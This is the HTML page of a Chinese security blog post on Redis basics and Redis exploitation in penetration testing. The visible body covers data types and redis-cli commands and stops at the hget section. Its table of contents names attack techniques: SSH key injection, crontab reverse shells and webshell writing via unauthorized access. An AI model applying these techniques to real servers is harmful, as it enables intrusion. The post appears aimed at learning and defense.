<!DOCTYPE html><html lang="zh-Hans"><head><meta name="generator" content="Hexo 3.8.0"><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport"><meta content="yes" name="apple-mobile-web-app-capable"><meta content="black-translucent" name="apple-mobile-web-app-status-bar-style"><meta content="telephone=no" name="format-detection"><meta name="description"><title>Redis 基础梳理以及其在渗透测试中的利用 | K0rz3n's Blog</title><link rel="stylesheet" type="text/css" href="/css/style.css?v=0.0.0"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/normalize/8.0.1/normalize.min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/pure-min.css"><link rel="stylesheet" type="text/css" href="//lib.baomitu.com/pure/1.0.0/grids-responsive-min.css"><link rel="stylesheet" href="//lib.baomitu.com/font-awesome/4.7.0/css/font-awesome.min.css"><script type="text/javascript" src="//lib.baomitu.com/jquery/3.4.0/jquery.min.js"></script><link rel="icon" mask sizes="any" href="/favicon.ico"><link rel="Shortcut Icon" type="image/x-icon" href="/favicon.ico"><link rel="apple-touch-icon" href="/apple-touch-icon.png"><link rel="apple-touch-icon-precomposed" href="/apple-touch-icon.png"><link rel="alternate" type="application/atom+xml" href="/atom.xml"></head><body><div class="body_container"><div id="header"><div class="site-name"><h1 class="hidden">Redis 基础梳理以及其在渗透测试中的利用</h1><a id="logo" href="/.">K0rz3n's Blog</a><p class="description">Shell-is-Only-the-Beginning</p></div><div id="nav-menu"><a class="current" href="/."><i class="fa fa-home"> Start</i></a><a href="/archives/"><i class="fa fa-archive"> Archiv</i></a><a href="/about/"><i class="fa fa-user"> Über</i></a><a href="/atom.xml"><i class="fa fa-rss"> RSS</i></a></div></div><div class="pure-g" id="layout"><div class="pure-u-1 pure-u-md-3-4"><div class="content_container"><div class="post"><h1 class="post-title">Redis 基础梳理以及其在渗透测试中的利用</h1><div class="post-meta">Nov 8, 2018<span> | </span><span class="category"><a href="/categories/备忘/">备忘</a></span><script src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script><span id="busuanzi_container_page_pv"> | <span id="busuanzi_value_page_pv"></span><span> Hits</span></span></div><div class="clear"><div class="toc-article" id="toc"><div class="toc-title">Inhalte</div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0X00-前言："><span class="toc-number">1.</span> <span class="toc-text">0X00 前言：</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X01-简介"><span class="toc-number">2.</span> <span class="toc-text">0X01 简介</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X02-小试牛刀"><span class="toc-number">3.</span> <span class="toc-text">0X02 小试牛刀</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-设置一个值并获取"><span class="toc-number">3.1.</span> <span class="toc-text">1.设置一个值并获取</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-查看配置并修改选项"><span class="toc-number">3.2.</span> <span class="toc-text">2.查看配置并修改选项</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X03-数据类型"><span class="toc-number">4.</span> <span class="toc-text">0X03 数据类型</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-String-类型"><span class="toc-number">4.1.</span> <span class="toc-text">1.String 类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-Hash-类型"><span class="toc-number">4.2.</span> <span class="toc-text">2.Hash 类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-List-类型"><span class="toc-number">4.3.</span> <span class="toc-text">3.List 类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-Set-类型"><span class="toc-number">4.4.</span> <span class="toc-text">4.Set 类型</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-ZSet-Sorted-set-类型"><span class="toc-number">4.5.</span> <span class="toc-text">5.ZSet(Sorted set )类型</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X04-Redis-常用命令"><span class="toc-number">5.</span> <span class="toc-text">0X04 Redis 常用命令</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-PING-命令"><span class="toc-number">5.1.</span> <span class="toc-text">1.PING 命令</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-有关-key-的命令"><span class="toc-number">5.2.</span> <span class="toc-text">2.有关 key 的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-del-删除键"><span class="toc-number">5.2.1.</span> <span class="toc-text">1.del 删除键</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-dump-序列化键"><span class="toc-number">5.2.2.</span> <span class="toc-text">2.dump 序列化键</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-exists-检查键是否存在"><span class="toc-number">5.2.3.</span> <span class="toc-text">3.exists 检查键是否存在</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-type-返回key-的存储类型"><span class="toc-number">5.2.4.</span> <span class="toc-text">4.type 返回key 的存储类型</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-keys-查找所有符合给定模式的-Key"><span class="toc-number">5.2.5.</span> <span class="toc-text">5.keys 查找所有符合给定模式的 Key</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-有关-String-的命令"><span class="toc-number">5.3.</span> <span class="toc-text">2.有关 String 的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-getrange-截取字符串"><span class="toc-number">5.3.1.</span> <span class="toc-text">1.getrange 截取字符串</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-strlen-返回-key-存储的字符串的长度"><span class="toc-number">5.3.2.</span> <span class="toc-text">2.strlen 返回 key 存储的字符串的长度</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-append-追加字符串"><span class="toc-number">5.3.3.</span> <span class="toc-text">3.append 追加字符串</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-mget-获取所有给定的-Key-的值"><span class="toc-number">5.3.4.</span> <span class="toc-text">4.mget 获取所有给定的 Key 的值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-mset-设置一个或者多个-key-value"><span class="toc-number">5.3.5.</span> <span class="toc-text">5.mset 设置一个或者多个 key-value</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-有关-Hash-的命令"><span class="toc-number">5.4.</span> <span class="toc-text">3.有关 Hash 的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-hmset-设置一个或者多个-field-value"><span class="toc-number">5.4.1.</span> <span class="toc-text">1.hmset 设置一个或者多个 field-value</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-hgetall-获取给定键值的-hash-表内容"><span class="toc-number">5.4.2.</span> <span class="toc-text">2.hgetall 获取给定键值的 hash 表内容</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-hexists-判断指定的-field-是否存在"><span class="toc-number">5.4.3.</span> <span class="toc-text">3.hexists 判断指定的 field 是否存在</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-hget-获取指定-field-的值"><span class="toc-number">5.4.4.</span> <span class="toc-text">4.hget 获取指定 field 的值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-hlen-获取-hash-表中字段的数量"><span class="toc-number">5.4.5.</span> <span class="toc-text">5.hlen 获取 hash 表中字段的数量</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-hkeys-获取所有的键值"><span class="toc-number">5.4.6.</span> <span class="toc-text">6.hkeys 获取所有的键值</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#7-hvals-获取所有的值"><span class="toc-number">5.4.7.</span> <span class="toc-text">7.hvals 获取所有的值</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-有关-List-的命令"><span class="toc-number">5.5.</span> <span class="toc-text">4.有关 List 的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-llen-获取列表的长度"><span class="toc-number">5.5.1.</span> <span class="toc-text">1.llen 获取列表的长度</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-lindex-通过索引获取列表中的元素"><span class="toc-number">5.5.2.</span> <span class="toc-text">2.lindex 通过索引获取列表中的元素</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-lrange-获取列表指定范围内的元素"><span class="toc-number">5.5.3.</span> <span class="toc-text">3.lrange 获取列表指定范围内的元素</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-linster-在元素的前或后插入元素"><span class="toc-number">5.5.4.</span> <span class="toc-text">4.linster 在元素的前或后插入元素</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-lpush-将一个或者多个值插入列表头部"><span class="toc-number">5.5.5.</span> <span class="toc-text">5.lpush 将一个或者多个值插入列表头部</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#6-lpop-移除并获取列表第一个元素"><span class="toc-number">5.5.6.</span> <span class="toc-text">6.lpop 移除并获取列表第一个元素</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#7-rpush-将一个或者多个值插入列表尾部"><span class="toc-number">5.5.7.</span> <span class="toc-text">7.rpush 将一个或者多个值插入列表尾部</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#8-rpop-移除并获取列表最后一个元素"><span class="toc-number">5.5.8.</span> <span class="toc-text">8.rpop 移除并获取列表最后一个元素</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-有关-Set-的命令"><span class="toc-number">5.6.</span> <span class="toc-text">5.有关 Set 的命令</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-sadd-向集合中添加一个或者多个成员"><span class="toc-number">5.6.1.</span> <span class="toc-text">1.sadd 向集合中添加一个或者多个成员</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-scard-返回集合的成员数"><span class="toc-number">5.6.2.</span> <span class="toc-text">2.scard 返回集合的成员数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-smembers-返回集合的所有成员"><span class="toc-number">5.6.3.</span> <span class="toc-text">3.smembers 返回集合的所有成员</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-sismember-判断是否是集合的成员"><span class="toc-number">5.6.4.</span> <span class="toc-text">4.sismember 判断是否是集合的成员</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X05-数据的备份与恢复"><span class="toc-number">6.</span> <span class="toc-text">0X05 数据的备份与恢复</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X06-Redis-在渗透测试中的利用"><span class="toc-number">7.</span> <span class="toc-text">0X06 Redis 在渗透测试中的利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-Redis-未授权访问："><span class="toc-number">7.1.</span> <span class="toc-text">1.Redis 未授权访问：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#1-漏洞描述："><span class="toc-number">7.1.1.</span> <span class="toc-text">1.漏洞描述：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-利用-Redis-获取敏感信息"><span class="toc-number">7.1.2.</span> <span class="toc-text">2.利用 Redis 获取敏感信息</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-Info"><span class="toc-number">7.1.2.1.</span> <span class="toc-text">(1)Info</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-keys-get-key"><span class="toc-number">7.1.2.2.</span> <span class="toc-text">(2)keys * / get key</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#3-写公钥直接-ssh-连接"><span class="toc-number">7.1.3.</span> <span class="toc-text">3.写公钥直接 ssh 连接</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-原理分析："><span class="toc-number">7.1.3.1.</span> <span class="toc-text">1.原理分析：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-大致的流程图如下"><span class="toc-number">7.1.3.2.</span> <span class="toc-text">2.大致的流程图如下</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-测试开始："><span class="toc-number">7.1.3.3.</span> <span class="toc-text">2.测试开始：</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#4-利用-crontable-反弹shell"><span class="toc-number">7.1.4.</span> <span class="toc-text">4.利用 crontable 反弹shell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-端口监听"><span class="toc-number">7.1.4.1.</span> <span class="toc-text">1.端口监听</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-设置某一个键的值为符合-crontable-格式的反弹-shell-一句话"><span class="toc-number">7.1.4.2.</span> <span class="toc-text">2.设置某一个键的值为符合 crontable 格式的反弹 shell 一句话</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#3-改变路径和文件名为-var-spool-cron-root"><span class="toc-number">7.1.4.3.</span> <span class="toc-text">3.改变路径和文件名为 /var/spool/cron/root</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#4-等待"><span class="toc-number">7.1.4.4.</span> <span class="toc-text">4.等待</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#5-利用-Redis-写-webshell"><span class="toc-number">7.1.5.</span> <span class="toc-text">5. 利用 Redis 写 webshell</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#1-概述"><span class="toc-number">7.1.5.1.</span> <span class="toc-text">1.概述</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#2-测试"><span class="toc-number">7.1.5.2.</span> <span class="toc-text">2.测试</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#1-写入-webshell"><span class="toc-number">7.1.5.3.</span> <span class="toc-text">1.写入 webshell</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#2-访问测试"><span class="toc-number">7.1.6.</span> <span class="toc-text">2.访问测试</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X07-如何防御"><span class="toc-number">8.</span> <span class="toc-text">0X07 如何防御</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#方法一：禁用高危命令（重启redis才能生效）"><span class="toc-number">8.1.</span> <span class="toc-text">方法一：禁用高危命令（重启redis才能生效）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法二：以低权限运行-Redis-服务（重启redis才能生效）"><span class="toc-number">8.2.</span> <span class="toc-text">方法二：以低权限运行 Redis 服务（重启redis才能生效）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法三：为-Redis-添加密码验证（重启redis才能生效）"><span class="toc-number">8.3.</span> <span class="toc-text">方法三：为 Redis 添加密码验证（重启redis才能生效）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法四：禁止外网访问-Redis（重启redis才能生效）"><span class="toc-number">8.4.</span> <span class="toc-text">方法四：禁止外网访问 Redis（重启redis才能生效）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法五：修改默认端口"><span class="toc-number">8.5.</span> <span class="toc-text">方法五：修改默认端口</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法五：设置文件的隐藏属性"><span class="toc-number">8.6.</span> <span class="toc-text">方法五：设置文件的隐藏属性</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#两个比较重要的命令："><span class="toc-number">8.6.1.</span> <span class="toc-text">两个比较重要的命令：</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#两个比较重要的参数："><span class="toc-number">8.6.2.</span> <span class="toc-text">两个比较重要的参数：</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#a-参数："><span class="toc-number">8.6.2.1.</span> <span class="toc-text">a 参数：</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#i-参数："><span class="toc-number">8.6.2.2.</span> <span class="toc-text">i 参数：</span></a></li></ol></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#方法六：设置防火墙策略"><span class="toc-number">8.7.</span> <span class="toc-text">方法六：设置防火墙策略　　</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X07-总结"><span class="toc-number">9.</span> <span class="toc-text">0X07 总结</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0X08-参考"><span class="toc-number">10.</span> <span class="toc-text">0X08 参考</span></a></li></ol></div></div><div class="post-content"><h2 id="0X00-前言："><a href="#0X00-前言：" class="headerlink" title="0X00 前言："></a><strong>0X00 前言：</strong></h2><p>之前一直说 NOSQL ，也看了不少文章对于未授权 NOSQL 的攻击案例，知道大致怎么用，但是自己一直没有尝试好好使用过，感觉对比 MYSQL 而言，我太轻视  NOSQL ，于是这次下定决心以 Redis 作为例子好好玩玩，特此记录备忘。</p>
<h2 id="0X01-简介"><a href="#0X01-简介" class="headerlink" title="0X01 简介"></a><strong>0X01 简介</strong></h2><p>我们知道 NOSQL 和 MYSQL 的差距还是非常大的，他不再是关系型数据库(也就是说他不在存在表这种东西)，那他是什么呢？实际上它是以键值对的形式存放数据的，很像 json 的形式，并且与关系型数据库相比 Redis 能存储的数据类型也多得多，它不仅能存储字符串型的数据，还能存储其他四种类型：list，set，zset(有序)，hash （就算是和同类 NOSQL 数据库 memcached 相比他也强大的多，因为 memcached 仅能支持比较单一的 key-value ），它支持数据在硬盘的持久化(EDB 快照或者是 AOF 的形式)，还有一个特点就是他的所有操作都是原子性的，也就是说要么成功执行，要么就完全不执行。</p>
<a id="more"></a>
<h2 id="0X02-小试牛刀"><a href="#0X02-小试牛刀" class="headerlink" title="0X02 小试牛刀"></a><strong>0X02 小试牛刀</strong></h2><h3 id="1-设置一个值并获取"><a href="#1-设置一个值并获取" class="headerlink" title="1.设置一个值并获取"></a><strong>1.设置一个值并获取</strong></h3><pre><code>127.0.0.1:6379&gt; set mykey abc
OK
127.0.0.1:6379&gt; get mykey 
&quot;abc&quot;
</code></pre><h3 id="2-查看配置并修改选项"><a href="#2-查看配置并修改选项" class="headerlink" title="2.查看配置并修改选项"></a><strong>2.查看配置并修改选项</strong></h3><pre><code>config get xxx (如果是 * 表示获取全部)
config set xxx yyy 
</code></pre><p><strong>注意：下面的配置项在我们的写 shell 的过程中比较有用</strong></p>
<p><strong>(1）获取 RDB 文件的存放位置</strong></p>
<pre><code>config get dir
</code></pre><p><strong>(2) 获取 RDB 文件的文件名(默认为dump.rdb)</strong></p>
<pre><code>config get dbfilename 
</code></pre><p><strong>(3) 判断 AOF 是否开启</strong></p>
<pre><code>config get appendonly
</code></pre><p><strong>（4）获取 AOF 的文件名(默认appendonly.aof)</strong></p>
<pre><code>config get appendfilename
</code></pre><p><strong>(5)获取 AOF 文件的备份方式(always everysec no)</strong></p>
<pre><code>config get appendfsync
</code></pre><h2 id="0X03-数据类型"><a href="#0X03-数据类型" class="headerlink" title="0X03 数据类型"></a><strong>0X03 数据类型</strong></h2><h3 id="1-String-类型"><a href="#1-String-类型" class="headerlink" title="1.String 类型"></a><strong>1.String 类型</strong></h3><p>String 是最基本的类型，这个类型是二进制安全的，也就是说能存储任何类型的数据，比如说 jpg 图片或者序列化的对象，string 类型的值最大能存储 512MB。</p>
<pre><code>127.0.0.1:6379&gt; set name K0rz3n
OK
127.0.0.1:6379&gt; get name
&quot;K0rz3n&quot;
127.0.0.1:6379&gt;
</code></pre><h3 id="2-Hash-类型"><a href="#2-Hash-类型" class="headerlink" title="2.Hash 类型"></a><strong>2.Hash 类型</strong></h3><p><strong>应用场景：</strong></p>
<p>我们要存储一个用户信息对象数据，其中包括用户ID、用户姓名、年龄和生日，通过用户ID我们希望获取该用户的姓名或者年龄或者生日；</p>
<p><strong>实现方式：</strong></p>
<p>Redis的Hash实际是内部存储的Value为一个HashMap，并提供了直接存取这个Map成员的接口。如图所示，Key是用户ID, value是一个Map。这个Map的key是成员的属性名，value是属性值。这样对数据的修改和存取都可以直接通过其内部Map的Key(Redis里称内部Map的key为field), 也就是通过 key(用户ID) + field(属性标签) 就可以操作对应属性数据。</p>
<p><strong>如图所示：</strong></p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/hash%E7%BB%93%E6%9E%84.png" alt="此处输入图片的描述"></p>
<p><strong>常用命令：</strong></p>
<pre><code>hget/hset/hgetall/hmset
</code></pre><p><strong>示例代码：</strong></p>
<pre><code>127.0.0.1:6379&gt; hmset 1 name K0rz3n age 20
OK
127.0.0.1:6379&gt; hget 1 name
&quot;K0rz3n&quot;
127.0.0.1:6379&gt; hget 1 age
&quot;20&quot;
127.0.0.1:6379&gt;
</code></pre><h3 id="3-List-类型"><a href="#3-List-类型" class="headerlink" title="3.List 类型"></a><strong>3.List 类型</strong></h3><p>Redis 列表是简单的字符串列表，按照插入顺序排序。你可以添加一个元素到列表的头部（左边）或者尾部（右边）,本质上是一个双向链表，列表最多可存储 2的32次方 - 1 个元素</p>
<p><strong>应用场景：</strong></p>
<p>Redis list的应用场景非常多，也是Redis最重要的数据结构之一，比如twitter的关注列表，粉丝列表等都可以用Redis的list结构来实现；</p>
<p><strong>常用命令：</strong></p>
<pre><code>lpush/rpush/lpop/rpop/lrange
</code></pre><p><strong>示例代码：</strong></p>
<pre><code>127.0.0.1:6379&gt; lpush list K0rz3n
(integer) 1
127.0.0.1:6379&gt; lpush list name
(integer) 2
127.0.0.1:6379&gt; rpush list age
(integer) 3
127.0.0.1:6379&gt; lrange list 0 10
1) &quot;name&quot;
2) &quot;K0rz3n&quot;
3) &quot;age&quot;
127.0.0.1:6379&gt;
</code></pre><h3 id="4-Set-类型"><a href="#4-Set-类型" class="headerlink" title="4.Set 类型"></a><strong>4.Set 类型</strong></h3><p><strong>应用场景：</strong></p>
<p>Redis set对外提供的功能与list类似是一个列表的功能，特殊之处在于set是可以自动排重的，当你需要存储一个列表数据，又不希望出现重复数据时，set是一个很好的选择，并且set提供了判断某个成员是否在一个set集合内的重要接口，这个也是list所不能提供的；</p>
<p><strong>实现方式：</strong></p>
<p>set 的内部实现是一个 value永远为null的HashMap，实际就是通过计算hash的方式来快速排重的，这也是set能提供判断一个成员是否在集合内的原因。</p>
<p><strong>常用命令：</strong></p>
<pre><code>sadd/spop/smembers/sunion
</code></pre><p><strong>示例代码：</strong></p>
<pre><code>127.0.0.1:6379&gt; sadd set K0rz3n
(integer) 1
127.0.0.1:6379&gt; sadd set name
(integer) 1
127.0.0.1:6379&gt; sadd set age
(integer) 1
127.0.0.1:6379&gt; sadd set name
(integer) 0
127.0.0.1:6379&gt; smembers set
1) &quot;age&quot;
2) &quot;K0rz3n&quot;
3) &quot;name&quot;
</code></pre><h3 id="5-ZSet-Sorted-set-类型"><a href="#5-ZSet-Sorted-set-类型" class="headerlink" title="5.ZSet(Sorted set )类型"></a><strong>5.ZSet(Sorted set )类型</strong></h3><p><strong>应用场景：</strong></p>
<p>Redis sorted set的使用场景与set类似，区别是set不是自动有序的，而sorted set可以通过用户额外提供一个优先级(score)的参数来为成员排序，并且是插入有序的，即自动排序。当你需要一个有序的并且不重复的集合列表，那么可以选择sorted set数据结构，比如twitter 的public timeline可以以发表时间作为score来存储，这样获取时就是自动按时间排好序的。</p>
<p><strong>实现方式：</strong></p>
<p>Redis sorted set的内部使用HashMap和跳跃表(SkipList)来保证数据的存储和有序，HashMap里放的是成员到score的映射，而跳跃表里存放的是所有的成员，排序依据是HashMap里存的score,使用跳跃表的结构可以获得比较高的查找效率，并且在实现上比较简单。</p>
<p><strong>常用命令：</strong></p>
<pre><code>zadd/zrange/zrem/zcard
</code></pre><p><strong>示例代码：</strong></p>
<pre><code>127.0.0.1:6379&gt; zadd zset 0 K0rz3n
(integer) 1
127.0.0.1:6379&gt; zadd zset 0 name
(integer) 1
127.0.0.1:6379&gt; zadd zset 0 age
(integer) 1
127.0.0.1:6379&gt; zadd zset 0 name
(integer) 0
127.0.0.1:6379&gt; zrangebyscore zset 0 10
1) &quot;K0rz3n&quot;
2) &quot;age&quot;
3) &quot;name&quot;
</code></pre><h2 id="0X04-Redis-常用命令"><a href="#0X04-Redis-常用命令" class="headerlink" title="0X04 Redis 常用命令"></a><strong>0X04 Redis 常用命令</strong></h2><h3 id="1-PING-命令"><a href="#1-PING-命令" class="headerlink" title="1.PING 命令"></a><strong>1.PING 命令</strong></h3><p>ping 命令查看是否连接 Redis 服务端成功</p>
<pre><code>127.0.0.1:6379&gt; ping
PONG
</code></pre><h3 id="2-有关-key-的命令"><a href="#2-有关-key-的命令" class="headerlink" title="2.有关 key 的命令"></a><strong>2.有关 key 的命令</strong></h3><h4 id="1-del-删除键"><a href="#1-del-删除键" class="headerlink" title="1.del 删除键"></a><strong>1.del 删除键</strong></h4><pre><code>127.0.0.1:6379&gt; set name K0rz3n
OK
127.0.0.1:6379&gt; del name
(integer) 1
</code></pre><p>命令执行成功后输出 (integer) 1，否则将输出 (integer) 0</p>
<h4 id="2-dump-序列化键"><a href="#2-dump-序列化键" class="headerlink" title="2.dump 序列化键"></a><strong>2.dump 序列化键</strong></h4><p>dump 序列化给定的键，并返回序列化后的值</p>
<pre><code>127.0.0.1:6379&gt; set name K0rz3n
OK
127.0.0.1:6379&gt; dump name
&quot;\x00\x06K0rz3n\a\x00R\xb7\x87H^\xd5B\n&quot;
</code></pre><h4 id="3-exists-检查键是否存在"><a href="#3-exists-检查键是否存在" class="headerlink" title="3.exists 检查键是否存在"></a><strong>3.exists 检查键是否存在</strong></h4><pre><code>127.0.0.1:6379&gt; exists name
(integer) 1
</code></pre><h4 id="4-type-返回key-的存储类型"><a href="#4-type-返回key-的存储类型" class="headerlink" title="4.type 返回key 的存储类型"></a><strong>4.type 返回key 的存储类型</strong></h4><pre><code>127.0.0.1:6379&gt; type name
string
</code></pre><h4 id="5-keys-查找所有符合给定模式的-Key"><a href="#5-keys-查找所有符合给定模式的-Key" class="headerlink" title="5.keys 查找所有符合给定模式的 Key"></a><strong>5.keys 查找所有符合给定模式的 Key</strong></h4><pre><code>127.0.0.1:6379&gt; keys n*
1) &quot;naddfgfd&quot;
2) &quot;naaaa&quot;
3) &quot;name&quot;
</code></pre><h3 id="2-有关-String-的命令"><a href="#2-有关-String-的命令" class="headerlink" title="2.有关 String 的命令"></a><strong>2.有关 String 的命令</strong></h3><h4 id="1-getrange-截取字符串"><a href="#1-getrange-截取字符串" class="headerlink" title="1.getrange 截取字符串"></a><strong>1.getrange 截取字符串</strong></h4><pre><code>127.0.0.1:6379&gt; getrange name 0 2
&quot;K0r&quot;
</code></pre><h4 id="2-strlen-返回-key-存储的字符串的长度"><a href="#2-strlen-返回-key-存储的字符串的长度" class="headerlink" title="2.strlen 返回 key 存储的字符串的长度"></a><strong>2.strlen 返回 key 存储的字符串的长度</strong></h4><pre><code>127.0.0.1:6379&gt; strlen name
(integer) 6
</code></pre><h4 id="3-append-追加字符串"><a href="#3-append-追加字符串" class="headerlink" title="3.append 追加字符串"></a><strong>3.append 追加字符串</strong></h4><pre><code>127.0.0.1:6379&gt; append name _is_not_a_hacker
(integer) 22
127.0.0.1:6379&gt; get name
&quot;K0rz3n_is_not_a_hacker&quot;
</code></pre><h4 id="4-mget-获取所有给定的-Key-的值"><a href="#4-mget-获取所有给定的-Key-的值" class="headerlink" title="4.mget 获取所有给定的 Key 的值"></a><strong>4.mget 获取所有给定的 Key 的值</strong></h4><pre><code>127.0.0.1:6379&gt; mget name mykey
1) &quot;K0rz3n_is_not_a_hacker&quot;
2) &quot;abc&quot;
</code></pre><h4 id="5-mset-设置一个或者多个-key-value"><a href="#5-mset-设置一个或者多个-key-value" class="headerlink" title="5.mset 设置一个或者多个 key-value"></a><strong>5.mset 设置一个或者多个 key-value</strong></h4><pre><code>127.0.0.1:6379&gt; mset name xiaoqiang age 20
OK
127.0.0.1:6379&gt; mget name age
1) &quot;xiaoqiang&quot;
2) &quot;20&quot;
</code></pre><h3 id="3-有关-Hash-的命令"><a href="#3-有关-Hash-的命令" class="headerlink" title="3.有关 Hash 的命令"></a><strong>3.有关 Hash 的命令</strong></h3><h4 id="1-hmset-设置一个或者多个-field-value"><a href="#1-hmset-设置一个或者多个-field-value" class="headerlink" title="1.hmset 设置一个或者多个 field-value"></a><strong>1.hmset 设置一个或者多个 field-value</strong></h4><pre><code>127.0.0.1:6379&gt; hmset people name K0rz3n age 20 school xd
OK
</code></pre><h4 id="2-hgetall-获取给定键值的-hash-表内容"><a href="#2-hgetall-获取给定键值的-hash-表内容" class="headerlink" title="2.hgetall 获取给定键值的 hash 表内容"></a><strong>2.hgetall 获取给定键值的 hash 表内容</strong></h4><pre><code>127.0.0.1:6379&gt; hgetall people
1) &quot;name&quot;
2) &quot;K0rz3n&quot;
3) &quot;age&quot;
4) &quot;20&quot;
5) &quot;school&quot;
6) &quot;xd&quot;
</code></pre><h4 id="3-hexists-判断指定的-field-是否存在"><a href="#3-hexists-判断指定的-field-是否存在" class="headerlink" title="3.hexists 判断指定的 field 是否存在"></a><strong>3.hexists 判断指定的 field 是否存在</strong></h4><pre><code>127.0.0.1:6379&gt; hexists people name
(integer) 1
127.0.0.1:6379&gt; hexists people hh
(integer) 0
</code></pre><h4 id="4-hget-获取指定-field-的值"><a href="#4-hget-获取指定-field-的值" class="headerlink" title="4.hget 获取指定 field 的值"></a><strong>4.hget 获取指定 field 的值</strong></h4><pre><code>127.0.0.1:6379&gt; hget people name
&quot;K0rz3n&quot;
